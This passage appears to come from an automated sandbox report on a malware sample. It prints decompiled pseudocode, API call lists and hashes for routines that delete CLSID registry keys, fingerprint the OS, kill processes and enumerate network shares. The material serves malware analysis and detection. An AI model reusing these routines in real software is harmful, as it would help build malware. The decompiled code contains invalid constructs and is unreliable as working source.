                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A896
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463A8C3
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463A8D8
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A8E4
                                                            • wsprintfW.USER32 ref: 0463A907
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463A934
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463A949
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A955
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0463A965
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 5455c326e5c93961222f17ad66c7b15dd3a4a712b086e2725ae6d8fa7b34c6b1
                                                            • Instruction ID: f0b13228d613b8cd32cad69503dcd74fa026e645424692e1002540ca7fe6bd83
                                                            • Opcode Fuzzy Hash: 5455c326e5c93961222f17ad66c7b15dd3a4a712b086e2725ae6d8fa7b34c6b1
                                                            • Instruction Fuzzy Hash: A9318171A40218ABEB10DFE0DC49F99737CEB45705F1041A8E605E6181FF766E58CF6A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E04655860(LONG* __ecx, signed int __edx, long _a4) {
                                                            				long _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				long _t38;
                                                            				long _t52;
                                                            				unsigned int _t64;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				void** _t71;
                                                            				void* _t72;
                                                            				void** _t75;
                                                            				void* _t76;
                                                            				long _t82;
                                                            				LONG* _t88;
                                                            				void* _t89;
                                                            
                                                            				_v12 = __edx;
                                                            				_t88 = __ecx;
                                                            				if(_a4 == 0) {
                                                            					if(__ecx[1] == 0) {
                                                            						L24:
                                                            						return _t38;
                                                            					}
                                                            					_t64 = 0xaaaaaaab * __edx >> 0x20 >> 1;
                                                            					if(_t64 >= 0x3a98) {
                                                            						_t64 = 0x3a98;
                                                            					} else {
                                                            						if(_t64 <= 0x3e8) {
                                                            							_t64 = 0x3e8;
                                                            						}
                                                            					}
                                                            					_t38 =  <  ? 0x7fffffff : timeGetTime() - _t88[4];
                                                            					if(_t38 < _t64) {
                                                            						goto L24;
                                                            					} else {
                                                            						_t82 = 0;
                                                            						_a4 = 1;
                                                            						_v8 = 0;
                                                            						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                            						asm("sbb ebx, ebx");
                                                            						_t67 =  ~_t38 + 1;
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						}
                                                            						L12:
                                                            						L12:
                                                            						if(_a4 != 0) {
                                                            							_a4 = 0;
                                                            							_t52 = timeGetTime();
                                                            							_t82 = _t52;
                                                            							_v8 = _t82;
                                                            							if(_t82 == 0) {
                                                            								_t52 = timeGetTime();
                                                            							}
                                                            							_t88[4] = _t52;
                                                            						}
                                                            						_t38 = _t88[2];
                                                            						_t75 =  *(_t38 + 4);
                                                            						if(_t75 == 0) {
                                                            							goto L22;
                                                            						}
                                                            						_t76 =  *_t75;
                                                            						_v16 = _t76;
                                                            						_t38 = _t82 -  *((intOrPtr*)(_t76 + 0x34));
                                                            						if(_t38 < _v12) {
                                                            							goto L22;
                                                            						}
                                                            						_t88[2] =  *(_t88[2] + 4);
                                                            						InterlockedDecrement( &(_t88[1]));
                                                            						_push(8);
                                                            						E04655B47(_t88[2]);
                                                            						_t89 = _t89 + 8;
                                                            						if(_t67 != 0) {
                                                            							 *_t88 = 0;
                                                            						}
                                                            						_t68 = _v16;
                                                            						L046553C0(_t68 + 0x8c);
                                                            						DeleteCriticalSection(_t68 + 0x6c);
                                                            						DeleteCriticalSection(_t68 + 0x54);
                                                            						HeapFree( *( *_t68), 0, _t68);
                                                            						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                            						asm("sbb ebx, ebx");
                                                            						_t67 =  ~_t38 + 1;
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						} else {
                                                            							_t82 = _v8;
                                                            							goto L12;
                                                            						}
                                                            						L22:
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						}
                                                            						L23:
                                                            						 *_t88 = 0;
                                                            						return _t38;
                                                            					}
                                                            				}
                                                            				if(InterlockedCompareExchange(__ecx, 1, 0) == 0) {
                                                            					while(1) {
                                                            						L3:
                                                            						_t38 = _t88[2];
                                                            						_t71 =  *(_t38 + 4);
                                                            						if(_t71 == 0) {
                                                            							goto L23;
                                                            						}
                                                            						_t72 =  *_t71;
                                                            						_t88[2] =  *(_t88[2] + 4);
                                                            						InterlockedDecrement( &(_t88[1]));
                                                            						_push(8);
                                                            						E04655B47(_t88[2]);
                                                            						_t89 = _t89 + 8;
                                                            						L046553C0(_t72 + 0x8c);
                                                            						DeleteCriticalSection(_t72 + 0x6c);
                                                            						DeleteCriticalSection(_t72 + 0x54);
                                                            						HeapFree( *( *_t72), 0, _t72);
                                                            					}
                                                            					goto L23;
                                                            				} else {
                                                            					goto L2;
                                                            				}
                                                            				do {
                                                            					L2:
                                                            					asm("pause");
                                                            				} while (InterlockedCompareExchange(_t88, 1, 0) != 0);
                                                            				goto L3;
                                                            			}


















                                                            0x0465586d
                                                            0x04655870
                                                            0x04655872
                                                            0x046558f2
                                                            0x04655a2b
                                                            0x04655a2b
                                                            0x04655a2b
                                                            0x04655901
                                                            0x04655909
                                                            0x0465591a
                                                            0x0465590b
                                                            0x04655911
                                                            0x04655913
                                                            0x04655913
                                                            0x04655911
                                                            0x04655934
                                                            0x04655939
                                                            0x00000000
                                                            0x0465593f
                                                            0x0465593f
                                                            0x04655941
                                                            0x0465594c
                                                            0x0465594f
                                                            0x04655959
                                                            0x0465595b
                                                            0x0465595e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04655964
                                                            0x04655968
                                                            0x0465596a
                                                            0x04655971
                                                            0x04655977
                                                            0x04655979
                                                            0x0465597e
                                                            0x04655980
                                                            0x04655980
                                                            0x04655986
                                                            0x04655986
                                                            0x04655989
                                                            0x0465598c
                                                            0x04655991
                                                            0x00000000
                                                            0x00000000
                                                            0x04655997
                                                            0x0465599b
                                                            0x0465599e
                                                            0x046559a4
                                                            0x00000000
                                                            0x00000000
                                                            0x046559ac
                                                            0x046559b3
                                                            0x046559b9
                                                            0x046559bc
                                                            0x046559c1
                                                            0x046559c6
                                                            0x046559c8
                                                            0x046559c8
                                                            0x046559ce
                                                            0x046559d9
                                                            0x046559e2
                                                            0x046559ec
                                                            0x046559f7
                                                            0x04655a02
                                                            0x04655a0c
                                                            0x04655a0e
                                                            0x04655a11
                                                            0x00000000
                                                            0x04655a13
                                                            0x04655a13
                                                            0x00000000
                                                            0x04655a13
                                                            0x04655a1b
                                                            0x04655a1d
                                                            0x00000000
                                                            0x00000000
                                                            0x04655a1f
                                                            0x04655a1f
                                                            0x00000000
                                                            0x04655a1f
                                                            0x04655939
                                                            0x04655883
                                                            0x04655892
                                                            0x04655892
                                                            0x04655892
                                                            0x04655895
                                                            0x0465589a
                                                            0x00000000
                                                            0x00000000
                                                            0x046558a3
                                                            0x046558a8
                                                            0x046558af
                                                            0x046558b5
                                                            0x046558b8
                                                            0x046558c5
                                                            0x046558c8
                                                            0x046558d1
                                                            0x046558db
                                                            0x046558e6
                                                            0x046558e6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04655885
                                                            0x04655885
                                                            0x04655885
                                                            0x0465588e
                                                            0x00000000

                                                            APIs
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465587F
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465588C
                                                            • InterlockedDecrement.KERNEL32(?), ref: 046558AF
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 046558D1
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 046558DB
                                                            • HeapFree.KERNEL32(?,00000000,?), ref: 046558E6
                                                            • timeGetTime.WINMM ref: 04655922
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0465594F
                                                            • timeGetTime.WINMM ref: 04655971
                                                            • timeGetTime.WINMM ref: 04655980
                                                            • InterlockedDecrement.KERNEL32(00000000), ref: 046559B3
                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 046559E2
                                                            • RtlDeleteCriticalSection.NTDLL(00000000), ref: 046559EC
                                                            • HeapFree.KERNEL32(?,00000000,?), ref: 046559F7
                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04655A02
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Interlocked$CompareCriticalDeleteExchangeSection$Timetime$DecrementFreeHeap
                                                            • String ID:
                                                            • API String ID: 517897276-0
                                                            • Opcode ID: ef54d8267ea0996c612912bc48be154208dc6a9aeefe2eb241749edb6db0d8ab
                                                            • Instruction ID: 260733d1c90920ee72217c24b5efc6e5610e22395309b6cd494cdec45a269599
                                                            • Opcode Fuzzy Hash: ef54d8267ea0996c612912bc48be154208dc6a9aeefe2eb241749edb6db0d8ab
                                                            • Instruction Fuzzy Hash: 8A51BC31600305EBDB249FA5D8CCB59B7B9FF48310F148029EE4ADB2A4EB78B905CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E04645A50(intOrPtr* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v18;
                                                            				struct _OSVERSIONINFOW _v300;
                                                            				signed int _v304;
                                                            				char _v308;
                                                            				char _v312;
                                                            				intOrPtr _v316;
                                                            				char _v348;
                                                            				signed int _t45;
                                                            				_Unknown_base(*)()* _t49;
                                                            				intOrPtr _t50;
                                                            				intOrPtr _t57;
                                                            				_Unknown_base(*)()* _t61;
                                                            				intOrPtr _t65;
                                                            				signed int _t73;
                                                            				intOrPtr _t76;
                                                            				intOrPtr _t86;
                                                            				intOrPtr _t89;
                                                            				signed short* _t90;
                                                            				intOrPtr _t93;
                                                            				void* _t95;
                                                            				void* _t97;
                                                            				signed int _t98;
                                                            				intOrPtr* _t100;
                                                            				signed int _t101;
                                                            				void* _t118;
                                                            
                                                            				_t45 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t45 ^ _t101;
                                                            				_t100 = __ecx;
                                                            				E0465DEA0(__edi, __ecx, 0, 0x120);
                                                            				_t97 = LoadLibraryA;
                                                            				_t49 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                            				if(_t49 == 0) {
                                                            					L4:
                                                            					_t50 = 0;
                                                            				} else {
                                                            					asm("xorps xmm0, xmm0");
                                                            					_v316 = 0;
                                                            					asm("movups [ebp-0x158], xmm0");
                                                            					asm("movups [ebp-0x148], xmm0");
                                                            					 *_t49( &_v348);
                                                            					_t76 = _v348;
                                                            					if(_t76 == 6 || _t76 == 9) {
                                                            						_t50 = 1;
                                                            					} else {
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            				 *((intOrPtr*)(_t100 + 0x10)) = _t50;
                                                            				 *((intOrPtr*)(_t100 + 0x14)) = E046459C0(GetCurrentProcess());
                                                            				E0465DEA0(_t97,  &_v300, 0, 0x11c);
                                                            				_v300.dwOSVersionInfoSize = 0x11c;
                                                            				if(GetVersionExW( &_v300) != 0) {
                                                            					_t89 = _v300.dwMajorVersion;
                                                            					_t93 = _v300.dwMinorVersion;
                                                            					 *(_t100 + 8) = _v300.dwBuildNumber;
                                                            					 *((intOrPtr*)(_t100 + 0xc)) = _v300.dwPlatformId;
                                                            					 *_t100 = _t89;
                                                            					 *((intOrPtr*)(_t100 + 4)) = _t93;
                                                            					 *(_t100 + 0x1c) = 0 | _v18 != 0x00000001;
                                                            					if(_t89 == 5 && _t93 == 2) {
                                                            						 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
                                                            					}
                                                            					_t90 =  &(_v300.szCSDVersion);
                                                            					_t23 = _t100 + 0x20; // 0x20
                                                            					_t95 = _t23 - _t90;
                                                            					do {
                                                            						_t73 =  *_t90 & 0x0000ffff;
                                                            						_t90 =  &(_t90[1]);
                                                            						 *(_t95 + _t90 - 2) = _t73;
                                                            					} while (_t73 != 0);
                                                            				}
                                                            				_t57 =  *_t100;
                                                            				if(_t57 != 6 ||  *((intOrPtr*)(_t100 + 4)) != 2) {
                                                            					if(_t57 != 0) {
                                                            						goto L21;
                                                            					} else {
                                                            						goto L14;
                                                            					}
                                                            				} else {
                                                            					L14:
                                                            					_t61 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetNtVersionNumbers");
                                                            					if(_t61 == 0) {
                                                            						return E04655AFE(_v8 ^ _t101);
                                                            					} else {
                                                            						 *_t61( &_v308,  &_v312,  &_v304);
                                                            						_t98 = _v304 & 0x0000ffff;
                                                            						_t92 =  *_t100;
                                                            						_t65 = _v308;
                                                            						_t86 = _v312;
                                                            						_v304 = _t98;
                                                            						_t118 = _t65 -  *_t100;
                                                            						if(_t118 > 0 || _t118 == 0 && _t86 >  *((intOrPtr*)(_t100 + 4))) {
                                                            							 *_t100 = _t65;
                                                            							 *((intOrPtr*)(_t100 + 4)) = _t86;
                                                            							 *(_t100 + 8) = _t98;
                                                            							 *(_t100 + 0x1c) = 0 | E046458B0(_t92, _t98) != 0x00000000;
                                                            							if( *_t100 == 5 &&  *((intOrPtr*)(_t100 + 4)) == 2) {
                                                            								 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
                                                            							}
                                                            						}
                                                            						L21:
                                                            						return E04655AFE(_v8 ^ _t101);
                                                            					}
                                                            				}
                                                            			}





























                                                            0x04645a59
                                                            0x04645a60
                                                            0x04645a6a
                                                            0x04645a6f
                                                            0x04645a74
                                                            0x04645a8a
                                                            0x04645a92
                                                            0x04645ad1
                                                            0x04645ad1
                                                            0x04645a94
                                                            0x04645a94
                                                            0x04645a97
                                                            0x04645aa8
                                                            0x04645aaf
                                                            0x04645ab6
                                                            0x04645ab8
                                                            0x04645ac2
                                                            0x04645aca
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04645ac2
                                                            0x04645ad3
                                                            0x04645ae8
                                                            0x04645af4
                                                            0x04645afc
                                                            0x04645b15
                                                            0x04645b1d
                                                            0x04645b23
                                                            0x04645b29
                                                            0x04645b32
                                                            0x04645b3b
                                                            0x04645b40
                                                            0x04645b43
                                                            0x04645b49
                                                            0x04645b58
                                                            0x04645b58
                                                            0x04645b5b
                                                            0x04645b61
                                                            0x04645b66
                                                            0x04645b70
                                                            0x04645b70
                                                            0x04645b73
                                                            0x04645b76
                                                            0x04645b7b
                                                            0x04645b70
                                                            0x04645b80
                                                            0x04645b85
                                                            0x04645b8f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04645b95
                                                            0x04645b95
                                                            0x04645ba2
                                                            0x04645baa
                                                            0x04645c3c
                                                            0x04645bac
                                                            0x04645bc1
                                                            0x04645bc3
                                                            0x04645bca
                                                            0x04645bcc
                                                            0x04645bd2
                                                            0x04645bd8
                                                            0x04645bde
                                                            0x04645be0
                                                            0x04645be9
                                                            0x04645beb
                                                            0x04645bee
                                                            0x04645c00
                                                            0x04645c03
                                                            0x04645c13
                                                            0x04645c13
                                                            0x04645c03
                                                            0x04645c16
                                                            0x04645c2a
                                                            0x04645c2a
                                                            0x04645baa

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04645A87
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645A8A
                                                            • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04645AD6
                                                            • GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04645B0D
                                                            • GetSystemMetrics.USER32(00000059), ref: 04645B52
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04645B9F
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645BA2
                                                            • GetSystemMetrics.USER32(00000059), ref: 04645C0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadMetricsProcSystem$CurrentProcessVersion
                                                            • String ID: GetNativeSystemInfo$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                            • API String ID: 3805471242-3094728150
                                                            • Opcode ID: 85147ef6a0dc5fae7a7bb03a75da69d4afdcdd2e9177bf47669c6b53879432ee
                                                            • Instruction ID: ec0c2200510a97a59105e2725a8ced057474271c91ac39659448d62283a610d8
                                                            • Opcode Fuzzy Hash: 85147ef6a0dc5fae7a7bb03a75da69d4afdcdd2e9177bf47669c6b53879432ee
                                                            • Instruction Fuzzy Hash: 6C514B70A00619EBDB34DF64C889BEAB7F4EF98314F10459DE94A97640FA74AAC4CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 56%
                                                            			E0463DD30(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                            				intOrPtr _v8;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t19;
                                                            				void* _t20;
                                                            				int _t25;
                                                            				int _t32;
                                                            				void* _t40;
                                                            				void* _t42;
                                                            				void* _t44;
                                                            				void* _t49;
                                                            				void* _t53;
                                                            				void* _t57;
                                                            				intOrPtr _t64;
                                                            				void* _t67;
                                                            				void* _t71;
                                                            				void* _t74;
                                                            
                                                            				_push(__ecx);
                                                            				_t40 = _a8;
                                                            				_t64 = __ecx;
                                                            				_t57 = 0;
                                                            				_v8 = __ecx;
                                                            				if(_t40 != 0) {
                                                            					do {
                                                            						_t74 = OpenProcess(0x1fffff, 0,  *(_t57 + _a4));
                                                            						TerminateProcess(_t74, 0);
                                                            						CloseHandle(_t74);
                                                            						_t57 = _t57 + 4;
                                                            					} while (_t57 < _t40);
                                                            					_t64 = _v8;
                                                            				}
                                                            				Sleep(0x64);
                                                            				_t19 =  *((intOrPtr*)(_t64 + 0xc));
                                                            				if(_t19 != 2) {
                                                            					__eflags = _t19 - 3;
                                                            					if(__eflags != 0) {
                                                            						_t20 = L0463DB90(_t64, __eflags);
                                                            						goto L10;
                                                            					} else {
                                                            						_t20 = E0463D980(_t57, _t64);
                                                            						_a8 = _t20;
                                                            						__eflags = _t20;
                                                            						if(_t20 == 0) {
                                                            							goto L10;
                                                            						} else {
                                                            							_t14 = LocalSize(_t20) + 1; // 0x1
                                                            							_t42 = LocalAlloc(0x40, _t14);
                                                            							_t67 = _a8;
                                                            							_t16 = _t42 + 1; // 0x1
                                                            							_t49 = _t16;
                                                            							 *_t42 = 0x8e;
                                                            							E0465E060(_t49, _t67, _t21);
                                                            							LocalFree(_t67);
                                                            							_t25 = LocalSize(_t42);
                                                            							_push(_t49);
                                                            							_push(0x3f);
                                                            							_push(_t25);
                                                            							_push(_t42);
                                                            							E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            							return LocalFree(_t42);
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t20 = E0463D570(_t57, _t64);
                                                            					_a8 = _t20;
                                                            					if(_t20 == 0) {
                                                            						L10:
                                                            						return _t20;
                                                            					} else {
                                                            						_t8 = LocalSize(_t20) + 1; // 0x1
                                                            						_t44 = LocalAlloc(0x40, _t8);
                                                            						_t71 = _a8;
                                                            						_t10 = _t44 + 1; // 0x1
                                                            						_t53 = _t10;
                                                            						 *_t44 = 0x8e;
                                                            						E0465E060(_t53, _t71, _t28);
                                                            						LocalFree(_t71);
                                                            						_t32 = LocalSize(_t44);
                                                            						_push(_t53);
                                                            						_push(0x3f);
                                                            						_push(_t32);
                                                            						_push(_t44);
                                                            						E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            						return LocalFree(_t44);
                                                            					}
                                                            				}
                                                            			}




















                                                            0x0463dd33
                                                            0x0463dd35
                                                            0x0463dd3a
                                                            0x0463dd3c
                                                            0x0463dd3e
                                                            0x0463dd43
                                                            0x0463dd45
                                                            0x0463dd58
                                                            0x0463dd5d
                                                            0x0463dd64
                                                            0x0463dd6a
                                                            0x0463dd6d
                                                            0x0463dd71
                                                            0x0463dd71
                                                            0x0463dd76
                                                            0x0463dd7c
                                                            0x0463dd82
                                                            0x0463dde9
                                                            0x0463ddec
                                                            0x0463de51
                                                            0x00000000
                                                            0x0463ddee
                                                            0x0463ddee
                                                            0x0463ddf3
                                                            0x0463ddf6
                                                            0x0463ddf8
                                                            0x00000000
                                                            0x0463ddfa
                                                            0x0463de05
                                                            0x0463de11
                                                            0x0463de14
                                                            0x0463de18
                                                            0x0463de18
                                                            0x0463de1b
                                                            0x0463de1f
                                                            0x0463de2e
                                                            0x0463de31
                                                            0x0463de33
                                                            0x0463de37
                                                            0x0463de39
                                                            0x0463de3a
                                                            0x0463de3e
                                                            0x0463de4c
                                                            0x0463de4c
                                                            0x0463ddf8
                                                            0x0463dd84
                                                            0x0463dd84
                                                            0x0463dd89
                                                            0x0463dd8e
                                                            0x0463de56
                                                            0x0463de5c
                                                            0x0463dd94
                                                            0x0463dd9f
                                                            0x0463ddab
                                                            0x0463ddae
                                                            0x0463ddb2
                                                            0x0463ddb2
                                                            0x0463ddb5
                                                            0x0463ddb9
                                                            0x0463ddc8
                                                            0x0463ddcb
                                                            0x0463ddcd
                                                            0x0463ddd1
                                                            0x0463ddd3
                                                            0x0463ddd4
                                                            0x0463ddd8
                                                            0x0463dde6
                                                            0x0463dde6
                                                            0x0463dd8e

                                                            APIs
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD52
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD5D
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,0463D47D,?,?), ref: 0463DD64
                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,0463D47D,?,?), ref: 0463DD76
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DD9B
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D47D,?,?), ref: 0463DDA5
                                                            • LocalFree.KERNEL32(?), ref: 0463DDC8
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DDCB
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DDDE
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DE01
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D47D,?,?), ref: 0463DE0B
                                                            • LocalFree.KERNEL32(?), ref: 0463DE2E
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DE31
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DE44
                                                              • Part of subcall function 0463DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0463DBDE
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC00
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC1E
                                                              • Part of subcall function 0463DB90: LocalSize.KERNEL32(00000000), ref: 0463DC25
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0463DC3C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Free$Size$Alloc$Process$CloseHandleOpenSleepTerminate
                                                            • String ID:
                                                            • API String ID: 363554170-0
                                                            • Opcode ID: 0b033c7a7830bcce0ac6095d3349074b6679de2c0b9caa53ccde4d53c9a91f7f
                                                            • Instruction ID: 2c3a69c423752f9fddf880cdde393b266ae35f92f91f1b4f4d045aea7ab4916a
                                                            • Opcode Fuzzy Hash: 0b033c7a7830bcce0ac6095d3349074b6679de2c0b9caa53ccde4d53c9a91f7f
                                                            • Instruction Fuzzy Hash: D931F572600218BBD714AFA5DC44DAAB7ADEF59321F04425AFA09D7240EF75BD00CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E046347A0() {
                                                            				void* _v8;
                                                            				int _v12;
                                                            				void* _v16;
                                                            				int _v20;
                                                            				int _v24;
                                                            				void* _v28;
                                                            				void* _t35;
                                                            				int _t38;
                                                            				int _t45;
                                                            				signed int* _t48;
                                                            				signed int _t49;
                                                            				int _t51;
                                                            				long _t57;
                                                            				signed int _t59;
                                                            				WCHAR* _t60;
                                                            				void* _t62;
                                                            				WCHAR** _t66;
                                                            				void* _t70;
                                                            
                                                            				_v20 = 0x4000;
                                                            				_t57 = 0;
                                                            				_v12 = 0xffffffff;
                                                            				_v16 = 0;
                                                            				if(WNetOpenEnumW(1, 1, 0, 0,  &_v16) == 0) {
                                                            					_v8 = LocalAlloc(0x40, 0x400);
                                                            					_t35 = LocalAlloc(0x40, _v20);
                                                            					_t62 = _t35;
                                                            					_v28 = _t62;
                                                            					if(_t62 != 0) {
                                                            						_t70 = _v8;
                                                            						while(1) {
                                                            							_t38 = WNetEnumResourceW(_v16,  &_v12, _t62,  &_v20);
                                                            							if(_t38 != 0) {
                                                            								break;
                                                            							}
                                                            							_v24 = _t38;
                                                            							if(_v12 > _t38) {
                                                            								_t66 = _t62 + 0x14;
                                                            								do {
                                                            									_t45 = lstrlenW( *_t66);
                                                            									if(_t57 + (_t45 + 1) * 2 <= LocalSize(_v8)) {
                                                            										_t70 = _v8;
                                                            									} else {
                                                            										_t70 = LocalReAlloc(_v8, _t57 + (lstrlenW( *_t66) + 1) * 2, 0x42);
                                                            										_v8 = _t70;
                                                            									}
                                                            									_t60 =  *_t66;
                                                            									_t48 = _t70 + _t57;
                                                            									do {
                                                            										_t59 =  *_t60 & 0x0000ffff;
                                                            										_t60 =  &(_t60[1]);
                                                            										 *_t48 = _t59;
                                                            										_t48 =  &(_t48[0]);
                                                            									} while (_t59 != 0);
                                                            									_t49 = lstrlenW( *_t66);
                                                            									_t66 =  &(_t66[8]);
                                                            									_t51 = _v24 + 1;
                                                            									_t57 = _t57 + _t49 * 2 + 2;
                                                            									_v24 = _t51;
                                                            								} while (_t51 < _v12);
                                                            								_t62 = _v28;
                                                            							}
                                                            						}
                                                            						LocalFree(_t62);
                                                            						WNetCloseEnum(_v16);
                                                            						if(_t70 == 0) {
                                                            							L19:
                                                            							return _t70;
                                                            						} else {
                                                            							if(_t57 >= 1) {
                                                            								_t70 = LocalReAlloc(_t70, _t57, 0x42);
                                                            								goto L19;
                                                            							} else {
                                                            								LocalFree(_t70);
                                                            								return 0;
                                                            							}
                                                            						}
                                                            					} else {
                                                            						return _t35;
                                                            					}
                                                            				} else {
                                                            					return 0;
                                                            				}
                                                            			}





















                                                            0x046347aa
                                                            0x046347b2
                                                            0x046347b4
                                                            0x046347c1
                                                            0x046347cc
                                                            0x046347e9
                                                            0x046347ee
                                                            0x046347f0
                                                            0x046347f2
                                                            0x046347f7
                                                            0x04634800
                                                            0x04634803
                                                            0x0463480f
                                                            0x04634817
                                                            0x00000000
                                                            0x00000000
                                                            0x0463481d
                                                            0x04634823
                                                            0x04634825
                                                            0x04634828
                                                            0x0463482a
                                                            0x0463483f
                                                            0x04634860
                                                            0x04634841
                                                            0x04634859
                                                            0x0463485b
                                                            0x0463485b
                                                            0x04634863
                                                            0x04634865
                                                            0x04634870
                                                            0x04634870
                                                            0x04634873
                                                            0x04634876
                                                            0x04634879
                                                            0x0463487c
                                                            0x04634883
                                                            0x04634889
                                                            0x04634892
                                                            0x04634893
                                                            0x04634896
                                                            0x04634899
                                                            0x0463489e
                                                            0x0463489e
                                                            0x04634823
                                                            0x046348ad
                                                            0x046348b2
                                                            0x046348ba
                                                            0x046348db
